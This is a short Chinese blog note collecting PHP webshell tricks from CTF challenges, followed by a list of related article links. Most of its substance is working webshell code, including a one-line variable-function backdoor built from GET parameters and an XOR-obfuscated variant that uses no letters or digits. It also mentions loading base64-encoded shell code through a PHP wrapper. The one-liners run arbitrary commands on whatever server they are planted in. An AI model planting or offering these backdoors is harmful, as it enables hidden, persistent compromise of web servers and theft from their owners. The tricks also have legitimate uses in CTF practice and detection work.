记录一下phpshell的几个tip

1. Meepwn2018 的 Mapl Story 题目

使用php伪协议包含base64编码的shell代码

2. php短标签

<?=

3. 不知道叫什么

4. 不知道叫什么2

$_GET[_]($_GET[__]);

5. 不用数字和字母，使用异或之类的位预算符（Meepwn OmegaSector）

$_='$<>/' ^ '{{{{';${$_}[_](${$_}[__]);

6. 流式shell

http://www.freebuf.com/articles/web/176571.html

#!/usr/bin/php

#!/usr/bin/env php

#!/usr/bin/env -S -P/usr/local/bin:/usr/bin php

#!/usr/bin/env -S-P/usr/local/bin:/usr/bin:${PATH} php

8. BOM

https://www.leavesongs.com/PENETRATION/XDCTF-2015-WEB2-WRITEUP.html#3mime-type

最后编辑于：2018.08.06 09:38:01

关于Mongodb的全面总结
关于Mongodb的全面总结 MongoDB的内部构造《MongoDB The Definitive Guide》...
中v中阅读 32,132评论 2赞 89
From：黑白之道
一套实用的渗透测试岗位面试题，你会吗？ 1.拿到一个待检测的站，你觉得应该先做什么？收集信息 whois、网站源...
g0阅读 10,397评论 0赞 9

Spring Cloud
Spring Cloud为开发人员提供了快速构建分布式系统中一些常见模式的工具（例如配置管理，服务发现，断路器，智...
卡卡罗2017阅读 135,584评论 19赞 139
【渗透神器系列】Metasploit
转自：https://thief.one/2017/08/01/1/?hmsr=toutiao.io&utm_me...
鲸息_Leon阅读 12,189评论 0赞 7
南邮CTF-WEB-writeup
2018/3/16 17:34:51 WEB题 1.签到题题目：key在哪里？ writeup:查看源代码即可获...
Sec小玖阅读 22,524评论 1赞 11

赞1赞

赞赏

手机看全文